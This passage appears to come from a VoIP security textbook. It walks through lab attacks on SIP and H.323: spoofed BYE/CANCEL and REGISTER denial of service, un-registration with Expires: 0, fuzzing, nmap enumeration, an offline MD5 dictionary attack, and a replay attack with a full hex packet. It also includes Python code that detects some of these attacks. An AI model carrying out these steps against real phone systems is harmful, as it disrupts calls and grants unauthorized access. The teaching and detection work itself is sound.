SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.5.122;branch=;received=192.168.5.122
From: "iSEC" <sip:Sonia@192.168.2.102>;tag=ff761a48
To: "iSEC" <sip:Kusum@192.168.2.102>;tag=as3a9bd758
Call-ID: 845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
CSeq: 2 BYE
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Content-Length: 0
A similar Denial of Service attack can be conducted with the SIP CANCEL method using the same steps as above. Instead of terminating an existing call in progress, which is possible via BYE, the CANCEL method can be used to execute a SIP DoS attack on SIP User Agents attempting to start a call. Hence, a BYE attack can be used during a call, and a CANCEL attack can be used before the call starts.
Denial of Service via REGISTER
Similar to the registration-hijacking attack, an attacker can perform a Denial of Service attack by associating a legitimate User Agent with a fake or non-existent IP address. When calls are redirected to the non-existent IP address, there will be no response and the call will fail. In order to perform a Denial of Service attack via a REGISTER packet, an attacker can submit the same registration request packet shown in Figure 2-10 but modify the Contact field in the SIP header and insert a fake/non-existent IP address. For example, if an attacker called Raina wanted to carry out a DoS attack on the user called Sonia, she could replace the Contact field, which has Sonia's IP address of 192.168.5.122, with a fake one like 118.118.8.118. Raina would then spoof a REGISTER request with the fake IP address instead of Sonia's, as shown in Figure 2-14.
Figure 2-14. Spoofing Contact field in SIP messages
Denial of Service via Un-register
Our next Denial of Service attack involves un-registering SIP User Agents. Un-registering makes it possible to remove a SIP User Agent from a Proxy server or Registrar. While un-registering is not a standard method stated in the SIP RFC, the ability to un-register a User Agent is supported by a few SIP devices.
Note ✎
The un-registration process has nothing to do with an existing call and should not be confused with the SIP BYE method.
The problem with the un-registration method is that authentication is usually not required to remove a User Agent from a SIP Proxy server or Registrar. Hence, if a SIP User Agent is legitimately registered to a SIP Proxy server, an attacker can simply attempt to un-register the User Agent. In order to un-register a User Agent, the REGISTER method is used (there is no UNREGISTER method in SIP). When sending the REGISTER method, instead of placing a standard expiration value in the packet (Expires value in the SIP header), such as 3600 or 7200, the attacker sets the value to zero. The attacker then sends the REGISTER packet with the Expires value set to zero to the SIP Proxy server or Registrar, which tells the server to un-register the User Agent immediately. The legitimate User Agent can attempt to re-register, but the attacker can simply send another UDP packet and immediately un-register it. Because the attack involves only one UDP packet, the attacker can execute the un-registration process once every few minutes for an indefinite period of time. This will prevent the legitimate SIP User Agent from registering to the SIP Proxy server or Registrar. Furthermore, this attack can be used in conjunction with the registration-hijacking attack discussed previously. Here's how to un-register a SIP session between two entities:
1. Open SiVuS.
2. Under the SIP tab, select Utilities ► Message Generator.
3. In the SIP Message section, enter the correct values in all fields for the REGISTER message. Values a through l can be entered from the following list, replacing all items in italic from your local network. The example below is based on the attacker Raina's terminating a call between Kusum and Sonia (based on the legitimate request in Figure 2-10). Notice step l, where the Expires value is set to zero:
a. Method: REGISTER
b. Transport: UDP
c. Called User: Sonia
d. Domain: 192.168.2.102
e. Via: SIP/2.0/TCP 192.168.5.122
f. To: Sonia <sip:Sonia@192.168.2.102>
g. From: Kusum <sip:Kusum@192.168.2.102>
h. From Tag: ff761a48
i. Call-ID: 845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
j. Cseq: 1 REGISTER
k. Contact: *
l. Expires: 0
4. Select the Start button. (The configuration information is also shown in Figure 2-15.)
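The three SIP DoS patterns above (a spoofed BYE or CANCEL, a REGISTER with a bogus Contact, and the Expires: 0 un-register) each leave a trace on the wire. The following Python is an added example written for this page, not SiVuS or Asterisk code: a monitor that tracks dialogs by Call-ID and From tag and flags each pattern. The SIP messages and IP addresses are constructed to mirror the Kusum/Sonia lab, and the source IP of each packet is assumed to be supplied by the capture layer.

```python
import re
from typing import Dict, List, Optional, Tuple

_HDR = re.compile(r"^([A-Za-z\-]+):\s*(.*)$")

def parse_sip(raw: str) -> Tuple[str, Dict[str, str]]:
    """(method, headers) of a SIP request; header names lower-cased."""
    lines = raw.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        m = _HDR.match(line)
        if m:
            headers[m.group(1).lower()] = m.group(2).strip()
    return lines[0].split()[0].upper(), headers

def uri_host(value: str) -> Optional[str]:
    """Host of the first sip: URI in a header value (sip:user@host[:port])."""
    m = re.search(r"sip:(?:[^@>;\s]+@)?([\w.\-]+)", value)
    return m.group(1) if m else None

def tag_of(value: str) -> str:
    m = re.search(r";tag=([^;\s]+)", value)
    return m.group(1) if m else ""

class SipWatcher:
    """Tracks dialogs seen on the wire and flags the three DoS patterns.
    Assumption: the capture layer supplies the IP the packet really came from;
    a caller behind NAT or an outbound proxy changes address, so known proxies
    would have to be whitelisted in a real deployment."""

    def __init__(self) -> None:
        # (Call-ID, From tag) -> source IP that originated that side of the dialog
        self.dialogs: Dict[Tuple[str, str], str] = {}

    def observe(self, src_ip: str, raw: str) -> List[str]:
        method, h = parse_sip(raw)
        key = (h.get("call-id", ""), tag_of(h.get("from", "")))
        alerts: List[str] = []
        if method == "INVITE":
            # A later BYE/CANCEL for this leg should come from the same host.
            self.dialogs.setdefault(key, src_ip)
        elif method in ("BYE", "CANCEL"):
            origin = self.dialogs.get(key)
            if origin is None:
                alerts.append(f"{method} for unknown dialog {key[0]} from {src_ip}")
            elif origin != src_ip:
                alerts.append(f"possible spoofed {method}: tag {key[1]} belongs to "
                              f"{origin}, packet came from {src_ip}")
        elif method == "REGISTER":
            contact = h.get("contact", "")
            if contact == "*" or h.get("expires") == "0" or ";expires=0" in contact:
                alerts.append(f"un-register (Expires: 0 / Contact: *) for "
                              f"{h.get('to', '?')} from {src_ip}")
            chost = uri_host(contact)
            if chost and chost != src_ip:
                alerts.append(f"REGISTER Contact {chost} does not match sender "
                              f"{src_ip} (possible hijack or bogus-Contact DoS)")
        return alerts

# Constructed lab traffic (not a real capture): Kusum at .122 calls Sonia; Raina
# at .200 then injects the spoofed BYE and the two REGISTER variants.
CALL_ID = "845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM"
INVITE = f"""INVITE sip:Sonia@192.168.2.102 SIP/2.0
Via: SIP/2.0/UDP 192.168.5.122
From: Kusum <sip:Kusum@192.168.2.102>;tag=ff761a48
To: Sonia <sip:Sonia@192.168.2.102>
Call-ID: {CALL_ID}
CSeq: 1 INVITE
"""
BYE = f"""BYE sip:Sonia@192.168.2.102 SIP/2.0
Via: SIP/2.0/UDP 192.168.5.122
From: Kusum <sip:Kusum@192.168.2.102>;tag=ff761a48
To: Sonia <sip:Sonia@192.168.2.102>;tag=as3a9bd758
Call-ID: {CALL_ID}
CSeq: 2 BYE
"""
UNREGISTER = """REGISTER sip:192.168.2.102 SIP/2.0
From: Sonia <sip:Sonia@192.168.2.102>;tag=1a2b3c
To: Sonia <sip:Sonia@192.168.2.102>
Call-ID: constructed-reg-1
CSeq: 1 REGISTER
Contact: *
Expires: 0
"""
BOGUS_CONTACT = """REGISTER sip:192.168.2.102 SIP/2.0
From: Sonia <sip:Sonia@192.168.2.102>;tag=4d5e6f
To: Sonia <sip:Sonia@192.168.2.102>
Call-ID: constructed-reg-2
CSeq: 2 REGISTER
Contact: <sip:Sonia@118.118.8.118>
Expires: 3600
"""

def run_demo() -> List[str]:
    w = SipWatcher()
    traffic = [("192.168.5.122", INVITE),  # legitimate call setup
               ("192.168.5.200", BYE),     # Raina's teardown, headers copied from the INVITE
               ("192.168.5.122", BYE),     # the very same BYE from Kusum herself is benign
               ("192.168.5.200", UNREGISTER), ("192.168.5.200", BOGUS_CONTACT)]
    return [a for src, msg in traffic for a in w.observe(src, msg)]
```

Note that the spoofed and the legitimate BYE are byte-for-byte identical; only the source address separates them, which is why the dialog table keyed on the INVITE is needed.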
Fuzzing SIP
Fuzzing is the process of submitting random data to a protocol or application in order to cause it to fail. If the program fails (crashes), security issues may be identified at failure points within the protocol or application. The SIP protocol can be fuzzed to test the robustness of a vendor's implementation of SIP. For example, if the protocol cannot defend against common fuzzing techniques, the availability of the VoIP network could be affected.
Figure 2-15. Un-registering SIP User Agents
The PROTOS project (http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html/) has a SIP fuzzing tool that can be used to test a VoIP network that uses SIP. We'll use the PROTOS tool to fuzz the SIP protocol as follows:
1. Download the fuzzer (a Java .jar file) from http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/c07-sip-r2.jar/. You'll need to have a Java VM running on your operating system.
2. Enter the following on the command line in order to get the options for the tool:
java -jar c07-sip-r2.jar
3. In order to test a SIP Proxy server/Registrar with the IP address of 192.168.11.17, enter the following on the command line:
java -jar c07-sip-r2.jar -touri 1108@192.168.11.17 -dport 5060
As shown in Figure 2-16, the fuzzer will run through all its test cases one by one. If the SIP Proxy server/Registrar fails, the fuzzer may have found a security issue with it. (It is neither quick nor easy to find a security issue with fuzzing, but it is the first step of a multiple-step approach.)
Figure 2-16. Fuzzing SIP
Summary
SIP is emerging as a major signaling protocol in VoIP infrastructures, especially on PC-based softphones. Because SIP is largely based on HTTP, it is probably the most seamless protocol to be used with IP networks. By the same token, it inherits quite a few of HTTP's security exposures. As we have seen, SIP's authentication methods are vulnerable to several attacks, including passive dictionary attacks. SIP's authentication model also allows attackers to retrieve the User Agent's password quite easily. Furthermore, the identity of any SIP User Agent cannot be trusted because attackers can hijack registration attempts of legitimate SIP devices. The reliability of the SIP network leaves much to be desired. We have discussed only a few of the large number of Denial of Service attacks against SIP User Agents and servers. Voice communications, including 911 calls, require a high level of reliability. Many SIP entities, including hard phones, softphones, gateways, and border controllers, are quite easy to take offline, cut off, or otherwise prevent from communicating. When building a VoIP network using SIP, it is important to know about the major problems with authentication and reliability. This chapter has focused on SIP's flaws in order to help organizations understand the risks. Chapter 9 will discuss the defenses for VoIP communication, including the use of SSIP (Secure SIP).
Chapter 3. SIGNALING: H.323 SECURITY
H.323, an International Telecommunication Union–Telecommunication Standardization Sector (ITU-T) standard, is a very common signaling protocol used on VoIP networks. As a signaling protocol, it is used for registration, authentication, and establishing endpoints on the network. Similar to SIP, H.323 handles signaling and relies on RTP for media transfer (discussed in Chapter 4). However, H.323 is a system specification comprising several other ITU-T protocols, including H.225 (manages registration, admission, and status), H.245 (the control protocol), H.450 (offers supplementary services), H.235 (provides security services for both signaling and media channels), H.239 (offers dual streaming), and H.460 (allows firewall traversal). Many VoIP deployments use H.323 because it can integrate better with existing PBX systems and offers stronger reliability than SIP. For more information on the H.323 standard, refer to http://www.itu.int/rec/T-REC-H.323-200606-I/en/. This chapter is dedicated to H.323 security as it pertains to VoIP. The emphasis will be on H.323's subprotocols, specifically the ones that manage authentication and authorization for H.323 endpoints (e.g., hard phones). The chapter will also cover the basics of H.323 security and H.323 attacks, including authentication, authorization, and Denial of Service (DoS).
H.323 Security Basics
The key parts of an H.323 VoIP network are endpoints and devices, including gatekeepers, media proxies, gateways, and border controllers. H.323 gatekeepers register and authenticate H.323 endpoints. They also store a database of all registered H.323 clients on the network. H.323 gateways, on the other hand, are devices that route calls from one H.323 gatekeeper to another, while Session Border Controllers help VoIP networks communicate around network firewalls. Refer to Chapter 1 for more information on each of these devices. The following are the core security aspects of H.323 that will be discussed in this section:
Enumeration (identifying H.323 devices)
Authentication (H.225)
Authorization (E.164 alias)
Enumeration
An effective way to enumerate a particular type of device on a network is to perform a port scan. For example, a web server can be enumerated by the presence of port 80. Table 3-1 lists the possible ports that an H.323 endpoint or device could be listening on. While some of the ports are static, such as TCP ports 1718, 1719, and 1720, many are not. After a session has been initialized, H.323 often needs a dynamic set of ports between the H.323 endpoint and gatekeeper. The ports can be anywhere between TCP 1024 and 65535, which is a major reason firewall teams dislike VoIP. (VoIP and firewalls will be discussed in Chapter 9.)
Table 3-1. H.323 Ports
Port                         Description            Static or Dynamic
80                           HTTP Management        Static
1718                         Gatekeeper Discovery   Static
1719                         Gatekeeper RAS         Static
1720                         H.323 Call Setup       Static
1731                         Audio Control          Static
1024-65535                   H.245                  Dynamic
1024, 1026, …, 65534 (even)  RTP (Audio/Video)      Dynamic
RTP port + 1 (odd)           RTCP (Control)         Dynamic
Complete the following exercise to enumerate H.323 devices on a network.
1. Download Nmap from http://insecure.org/nmap/.
2. Type nmap.exe on the command line to retrieve the syntax of the tool.
3. Type the following on the command line to enumerate H.323 endpoints and gatekeepers:
nmap.exe -sT -p 1718,1719,1720,1731 <IP Address Range>
For a class B network on the 172.16.0.0 network, type the following:
nmap.exe -sT -p 1718,1719,1720,1731 172.16.0.0/16
All IP addresses that show open in the STATE column are probably H.323 devices. See Figure 3-1 for an example in which 172.16.1.107 seems to be an H.323 device.
Figure 3-1. Enumerating H.323 entities
Once an H.323 device, such as a gatekeeper, has been identified on the network, an H.323 endpoint can register to it. Often, enterprise deployments of H.323 do not require authentication for H.225 registration; hence, an attacker can simply download the H.323 endpoint of his or her choice and register with the gatekeeper. Once an H.323 endpoint registers to a gatekeeper, all available H.323 information (such as other endpoints on the network) can be enumerated. This allows any anonymous, unauthorized user to find all H.323 entities on the network, including E.164 aliases for spoofing attacks (discussed later in this chapter). Complete the following exercise to register with an H.323 gatekeeper.
1. Download PowerPlay (http://www.bnisolutions.com/products/powerplay/ipcontact.html/) or your favorite H.323 client.
2. Open PowerPlay by choosing Start ► Programs ► PowerPlay ► PowerPlay Control Panel.
3. Select the Gatekeeper tab.
4. In the middle of the screen, there is a text box with two options: one is to automatically discover H.323 gatekeepers, and the other is for statically setting the gatekeeper address. Type the IP address of any node that had port 1719 open from the port scan results. Alternatively, select Automatic Discovery, and PowerPlay will find the H.323 gatekeepers automatically.
5. Once the gatekeeper is entered into the text box, click OK. The PowerPlay icon in the taskbar will turn green once it has registered with the gatekeeper (assuming authentication has not been enabled, which is the norm).
Done! You have now enumerated H.323 gatekeepers on the network and successfully registered your H.323 client. At this point, voice calls to other H.323 clients can be performed. Additionally, enumeration of the VoIP network can now occur, providing you with E.164 aliases and phone numbers. If the H.323 gatekeeper on the network requires authentication, consider using Ekiga (http://ekiga.org/), an alternative H.323 client that has authentication support. Complete the following exercise to register with an H.323 gatekeeper that requires authentication.
1. Download and install Ekiga from http://ekiga.org/.
2. Open Ekiga by choosing Start ► Programs ► Ekiga ► Ekiga.
3. Select Edit ► Accounts ► Add.
4. Enter the following information:
a. Account Name: Account Name
b. Protocol: H.323
c. Gatekeeper: IP address of gatekeeper found with the port scan
d. User: Username for the account
e. Password: Password for the account
Authentication
H.323 endpoints can use three different methods for authentication: symmetric encryption, password hashing, and public key.
Symmetric Encryption
Symmetric encryption uses a shared secret between the H.323 endpoint and gatekeeper. Each endpoint has a General ID set up beforehand, which along with the receiver's General ID, a timestamp, and a random number is encoded by the secret key (derived from the shared secret). This CryptoToken is then sent to the authenticating device. The authenticating device performs the same function and checks that the items match to determine if the registration is successful.
Password Hashing
The second method for authentication is password hashing. H.323 endpoints use a username (H.323 ID or General ID) and password (via H.225) for H.323 devices, such as a media gateway or media proxy. In order to protect the endpoint's password, it is not sent over the network in cleartext. The password is hashed using the MD5 hashing algorithm. However, because creating an MD5 hash of just the password would make the authentication method vulnerable to a replay attack, the password is combined with the username (H.323 ID or General ID) and an NTP timestamp in order to make the hash unique for each authentication request. The timestamp, username, and password are ASN.1-encoded individually and then combined to create an ASN.1 buffer. The ASN.1 buffer is then hashed using MD5 and sent to the gatekeeper.
Note ✎
ASN.1 (Abstract Syntax Notation One) is a set of encoding rules that transform data into a standard format for later abstraction. ASN.1-encoded data can be decoded by any entity that has ASN.1 support, which includes any H.323 endpoints, gateways, and gatekeepers. H.323 uses ASN.1 and PER (Packed Encoding Rules) to reduce packet size for low-bandwidth networks and/or optimal throughput.
Once the gatekeeper has the MD5 hash, it can perform the same function as the H.323 endpoint in order to ensure that the endpoint has the correct password. The gatekeeper performs the same hashing exercise, using the ASN.1-encoded username, password, and timestamp (from the NTP server) to see if both hashes match. If they do, the gatekeeper knows that the H.323 endpoint has used the correct password. If the hashes do not match, the gatekeeper knows that the password used by the endpoint is not correct and therefore, the endpoint is not authenticated. Figure 3-2 illustrates the authentication process with H.225. In Figure 3-2, an example authentication process is shown between an H.323 endpoint and authenticator, such as a gatekeeper. The steps are as follows:
1. The H.323 endpoint requests authentication.
2. Both entities get the timestamp from the NTP server, which is based on the time elapsed in seconds from January 1, 1970.
3. The endpoint ASN.1 encodes its username, password, and NTP values individually and then creates an ASN.1 buffer.
4. The ASN.1 buffer is used to create the MD5 hash (identified as cryptoEPPwdHash in the packet), which is then sent to the gatekeeper.
Figure 3-2. H.323 authentication process
5. The gatekeeper, which already knows the username and password, retrieves the timestamp information from the NTP server to perform the same exercise. If the MD5 hash created by the gatekeeper matches the MD5 hash that the H.323 endpoint sent over the network, the gatekeeper knows that the password is correct and can then authenticate the endpoint.
Of all the authentication methods, password hashing seems to be the most common, but it's also vulnerable to a few attacks (as discussed in "H.323 Security Attacks").
Public Key
The last method of authentication is public key. This model uses certificates instead of shared secrets located on the ends of the H.323 authentication process. This method is the most secure for authentication, but it is also the most cumbersome because of the use of certificates on each endpoint of the VoIP network.
Authorization
H.323 endpoints use an E.164 alias for identification. The E.164 alias is an international numbering system that comprises a country code (CC), optional national destination code (NDC), and a subscriber number (SN). An E.164 alias can be up to 15 numeric values in length, set dynamically by a gatekeeper or locally by the endpoint itself. The E.164 alias is commonly used as the primary identifier for H.323 endpoints. The alias is also useful for security, as aliases can be grouped for different call privileges. For example, one specific set of E.164 aliases can be allowed to register to gatekeepers and make calls anywhere (e.g., aliases starting with 510), while a different group of E.164 aliases might be authorized to register and dial internal numbers (e.g., aliases starting with 605). Yet another set of aliases might be able to call executive conference bridges (e.g., aliases starting with 415). Figure 3-3 shows how E.164 aliases can be used to control dial-out procedures by H.323 endpoints.
Figure 3-3. E.164 alias for security controls
Figure 3-3 shows an example authorization process between gatekeepers that permit access to certain types of functions based on the E.164 alias. The gatekeeper allows outbound international calls only to group A, unlimited internal calls to group B, and calls to the executive conference bridge to group C.
Note ✎
When it comes to security, E.164 aliases can be considered similar to a MAC address on Ethernet cards. MAC address filtering is often used on Ethernet switches to limit access to certain parts of a network. While E.164 aliases are not MAC address equivalents (endpoints still have their own Ethernet MAC addresses), the E.164 alias is used as a trusted identifier for H.323 endpoints.
H.323 Security Attacks
H.323 endpoints use H.225's Registration Admission Status (RAS) for many security items, including authentication and registration functions. RAS services allow endpoints, gatekeepers, and gateways to chatter with one another in order to ensure that each device is registered, can talk appropriately, and is still alive. Items like registration connectivity, bandwidth changes, active/non-active status, and un-registrations between endpoint/gatekeepers occur with the use of RAS. In terms of security, RAS handles key components for H.323 networks. For example, when an H.323 endpoint is connected to the network, it must use RAS's registration function to speak in the VoIP environment. If the endpoint is unable to register or cannot register via RAS, the endpoint is simply not there. RAS also handles authentication for H.323. Once an endpoint is registered, the endpoint's username/password is confirmed to/from the gatekeeper. After registration and authentication have occurred via RAS on H.323 VoIP networks, endpoints can start making or receiving phone calls. Before the RAS services are implemented, neither can happen. H.225's registration (authentication) process does protect the password against common sniffing attacks, because it does not send the password across the network in cleartext. Unfortunately, H.225 is still vulnerable to many security attacks. The attacks that will be discussed are:
Username enumeration (H.323 ID)
H.323 password retrieval (offline dictionary attack)
Replay attack on H.225 authentication
H.323 endpoint spoofing (E.164 alias)
E.164 alias enumeration
E.164 hopping attacks
Denial of Service via NTP
Denial of Service via UDP (H.225 registration reject)
Denial of Service via H.225 nonStandardMessage
Denial of Service via Host Unreachable packets
Username Enumeration (H.323 ID)
When authentication is required between a gatekeeper and an H.323 endpoint, the H.323 endpoint will send its username and password to the authenticating device, as noted in the architecture described in Figure 3-2. In order to capture the username used by the H.323 endpoint, an attacker can simply sniff the network and capture the username in cleartext. A switched network provides little protection, as an attacker can perform a man-in-the-middle attack and capture all the H.225 usernames within the local subnet. Several attacks can be attempted by an attacker once the username has been captured, including brute-force attacks. Wireshark can be used as the sniffer program to capture the username, which will be noted as the H.323-ID under the H.225.0 RAS section of the packet trace. Complete the following exercise to sniff the H.225 username during the authentication process of two H.323 devices.
1. Ensure that the H.323 gatekeeper has been enabled on your lab network.
2. Open your favorite H.323 client.
3. Open Wireshark for network sniffing by choosing Start ► Programs ► Wireshark ► Wireshark.
4. From the menu bar, select Capture ► Interfaces ► Prepare.
5. Select Update list of packets in real time, then select Start.
6. From the H.323 endpoint, connect to the H.323 gatekeeper using Ekiga by entering its IP address in the appropriate location. Furthermore, ensure that the correct username and password have been entered for H.225 authentication. (In our example, the H.323 endpoint uses the username of USER.)
7. Once the H.323 endpoint is connected to the H.323 gatekeeper, stop sniffing on Wireshark.
8. Using Wireshark, scroll down and select a packet that has the Protocol label of H.225.0 and the Info description as RAS: RegistrationRequest (as shown in line number 4950 in Figure 3-4).
Figure 3-4. Wireshark and H.225 packets
9. In the protocol details section of Wireshark (middle section), expand the following: H.225.0 RAS ► RAS Message: registrationRequest ► registrationRequest ► cryptoTokens ► Item 0 ► Item: cryptoEPPwdHash ► cryptoEPPwdHash ► alias: H.323-ID ► H323.ID: [USERNAME]
The entry labeled H323.ID: [USERNAME] is the username of the H.323 endpoint, which is shown as USER in cleartext, as you can see in Figure 3-5.
Figure 3-5. H.225 username in cleartext
H.323 Password Retrieval
Now that we have retrieved the username of the H.323 endpoint (H.323 ID), let's attempt to get the password. The authentication process of H.323 endpoints uses H.225, as shown in Figure 3-2. The password is ASN.1-encoded, along with the username (H.323 ID) and timestamp (created from the time in seconds from January 1, 1970), to create an ASN.1-encoded buffer. The ASN.1-encoded buffer is then used to create an MD5 hash (labeled as cryptoEPPwdHash). As mentioned previously, this model ensures that the password is not sent over the network in cleartext; however, the model is not immune to basic offline brute-force attacks. The following equation is used to create the MD5 password used as the authenticating entity by the endpoint:
MD5(ASN.1 Encoded: H.323 ID + Password + timestamp) = Hash
This method is vulnerable to an offline dictionary attack. An attacker sniffing the network, using a man-in-the-middle attack, can capture two of the three items required to brute-force the password offline. Furthermore, because H.323 endpoints often use basic passwords, such as the four-digit extension of the hard phone or softphone, the time required to gain the password is minimal.
In order to perform an offline dictionary attack, the attacker needs to sniff the username, timestamp, and resulting MD5 hash from the network, which all go over the network in cleartext. Note in Figure 3-6 that the H.323-ID row has the username (USER), the timestamp row has the timestamp Nov 7, 2006 10:32:45.00000000, and the hash row has the resulting MD5 hash: 1C8451595D9AC7B983350D268DB7F36E.
Figure 3-6. Packet capture of H.323 authentication packet
At this point, an attacker can take a dictionary list of passwords and insert each one into the equation along with all the other items that have been captured:
MD5(ASN.1-encoded: H.323-ID + password + timestamp) = hash
For the brute-force attack, the attacker takes a password from the dictionary file, along with the username (H.323 ID) and timestamp, and then ASN.1 encodes each value individually. The ASN.1-encoded buffer is then hashed using the MD5 hashing function. If the MD5 hash that the attacker created with the trial password is the same MD5 hash captured over the network, then the attacker knows that she has correctly guessed the password. If the MD5 hash is not correct, the attacker inserts a second password into the equation, generates a new hash, and repeats the process until she creates a hash that matches the hash captured over the network. We can also look at the process with a simple equation, such as 5 + x = 8. People can brute-force numbers in place of x until they receive the correct answer. The attacker can start with 1, which is not correct because it equals 6; then 2, which is not correct because the answer is 7; and then 3, which is correct because the answer is 8. The attacker has determined through brute force that x = 3. Unlike an online brute-force attack, where the attacker may have only limited attempts before he is locked out or noticed on the network, the attacker can perform this test indefinitely (offline on his own PC) until he has cracked the password. Furthermore, because most H.323 hard phones and softphones contain easy-to-guess passwords, this exercise will probably not take too long. For example, if the attacker inserts the known values that were sniffed from the network in our example above into the previous equation, the only unknown is the password, as shown in the new equation:
MD5(ASN.1 Encoded: USER + Password + 1162895565) = 1C8451595D9AC7B983350D268DB7F36E
The attacker can now attempt passwords until he receives the correct hash that was sniffed over the network. The following demonstration explores this passive dictionary attack on H.225 authentication. The first column shows the sniffed username, the second column is the variable that uses a big list of dictionary words for brute-forcing (noted in bold text), the third column shows the sniffed timestamp, and the fourth column shows the resulting MD5 hash value. Once the newly generated MD5 hash value matches the one sniffed over the network (highlighted in bold in the last row), the attacker knows he has guessed the correct password used by the H.323 endpoint.
Sniffed (Captured) Entities over the network:
- Username: USER
- Timestamp: 1162895565
- MD5 Hash: 1c8451595d9ac7b983350d268db7f36e
MD5(ASN.1 Encoded: Username + Password + Timestamp) = Hash
USER + test  + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + Sonia + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + Raina + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + 1108  + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + 1117  + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + isec  + 1162895565  !=  1C8451595D9AC7B983350D268DB7F36E
USER + PASS  + 1162895565  =   1C8451595D9AC7B983350D268DB7F36E
H.323 Replay Attack
H.225 authentication is also vulnerable to a replay attack. A replay attack occurs when the same hash, a password equivalent value, can be re-sent by a different source and authenticated successfully. For example, if an entity was accepting only the MD5 hash of passwords for authentication, an attacker could simply capture any MD5 hash over the network, such as the hash of "iSEC," and replay it. While the attacker does not know what the password is, she has replayed the password equivalent value and been authenticated. For this reason, most MD5 hashes are salted using some random value. For H.323, this is the timestamp, but using the timestamp presents other issues.
Note ✎
In order to prevent simple MD5 hashing of every word in the dictionary, H.323 uses the timestamp (which is unique for each authentication request), username (H.323-ID), and the password to create the MD5 hash. Hence, if the password is iSEC, it will be combined with the username and current timestamp to create a unique MD5 value for every authentication attempt.
If the endpoint and gatekeeper use different timestamps from the NTP server, the hash created by the H.323 endpoint will be invalid. For example, if the endpoint receives a timestamp of Oct 2, 2008 6:34:00 and the gatekeeper receives a timestamp of Oct 2, 2008 6:34:01, the MD5 hashes will be different and the gatekeeper will reject the authentication. As one can imagine, managing the timestamp from multiple NTP devices with hundreds of H.323 endpoints and gatekeepers can become cumbersome even if the timestamp is off by .01 seconds. Therefore, the H.323 gatekeepers allow an MD5 hash that was created with an older timestamp (usually within 30 to 60 minutes) to authenticate successfully. While this helps tremendously for operational purposes (otherwise, H.323 endpoints could not consistently authenticate), it allows an attacker to perform a replay attack. Even though unique timestamps, usernames, and passwords are used to create the MD5 hash, the MD5 hash is allowed to be reused (replayed) within a 30- or 60-minute interval. It's quite simple to perform a replay attack. The malicious user simply sniffs (captures) the MD5 hash from the endpoint to the gatekeeper and replays the hash value back to the gatekeeper, which allows the attacker's H.323 client to be authenticated. Complete the following steps to perform a replay attack:
1. Ensure that the H.323 gatekeeper has been enabled on your lab network.
2. Open your favorite H.323 endpoint.
3. On a second machine (the attacker's machine), open Wireshark for network sniffing.
4. From the H.323 endpoint on the first machine, connect to the H.323 gatekeeper by entering the correct username and password.
5. Once the H.323 endpoint is connected to the H.323 gatekeeper, stop sniffing on Wireshark on the second machine.
6. Scroll down on Wireshark and select a packet with the Protocol label of H.225.0 and the Info description as RAS: RegistrationRequest.
7. To get the username, expand the H.225.0 RAS entry in the protocol details section of Wireshark (middle section) so that it appears as follows:
RAS Message: registrationRequest
  registrationRequest
    cryptoTokens
      Item 0
        Item: cryptoEPPwdHash
          cryptoEPPwdHash
            alias: H.323-ID
              H323.ID: [USERNAME]
8. To get the MD5 hash, expand H.225.0 RAS in the protocol details section of Wireshark (middle section) so that it looks like this:
RAS Message: registrationRequest
  registrationRequest
    cryptoTokens
      Item 0
        Item: cryptoEPPwdHash
          token
A value labeled hash under token should be visible with an MD5 value following it. This is the MD5 hash value that can be replayed by the attacker. (See the MD5 hash value in Figure 3-7.)
Note ✎
Notice the timestamp four rows above this MD5 hash value. This allows the attacker to know how long (in minutes) the MD5 is valid in order to perform the replay attack.
9. Using a packet-generation tool, such as Nemesis or Sniffer Pro, create an authentication packet and send it to the gatekeeper of your choice. The easiest method to perform this action is to send an authentication request from your H.323 endpoint to your gatekeeper. This attempt will be rejected because you do not have the correct username (H.323-ID) and password; however, it can be used as the template for the new packet you are about to create.
Figure 3-7. Wireshark and MD5 hash with an H.225 packet
10. Once you have the template from your H.225 Registration Request, simply replace the incorrect username (in hex) and the MD5 hash that was used with the values captured over the network (the username captured from the network in hex as well as the MD5 hash to be replayed).
11. Once the old username/MD5 hash is replaced with the new values captured from the network, send that packet. This will allow the request to be successfully logged into the gatekeeper using a replay attack.
The following hex information is an example of a full H.225 registration request packet. The bold information on the first line is the targeted IP address of the gatekeeper (c0a87479 is 192.168.116.28 in hex). The second item in bold is the username in hex captured by the sniffed session (00550053004500520000 is USER in hex). Finally, the last item in bold is the captured MD5 hash for the H.225 registration request packet.
Note ✎
Items in italic are unique to my lab environment; these items will be different in your own lab environment.
0e8008be060008914a0005800100c0a8 - IP address
744906b80100c0a8744906b722c08201010007000000000000000001343900000000000000000000000000000002400c0044004900470053002d0069005300450043002d007400730074050049835869c376820101000754616e64626572670134392c2b10302e010404005500530045 - User Name (e.g. USER)
00520000c04550d14c082a864886f70d02050080801c8451595d9ac7b983350d - MD5 Hash
268db7f36e01000100010001000518010000126d015020df8903596f45199f2773c0a59274af00005020df8903596f45199f2773c0a59274af00463c617373656e743e3c617373656e745f747970653e636c69656e743c2f617373656e745f747970653e3c76657273696f6e3e313c2f76657273696f6e3e3c2f617373656e743e
Once the new H.225 registration request packet has been created and sent with the sniffed MD5 hash, the attacker will have successfully authenticated using a replay attack.
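The gatekeeper-side check of Figure 3-2 and the timestamp acceptance window that makes the replay above possible can be modelled in a few lines. The following Python is an added example written for this page, not code from any H.323 stack: the real ASN.1 PER encoding of the H.235 token is replaced by a labelled length-prefixed stand-in (so the digest here does not equal the 1C84... value captured above), and the replay cache is a hardening idea added here, not a documented gatekeeper feature.

```python
import hashlib
import hmac
import struct
from typing import Dict, List, Set, Tuple

def encode_field(value: bytes) -> bytes:
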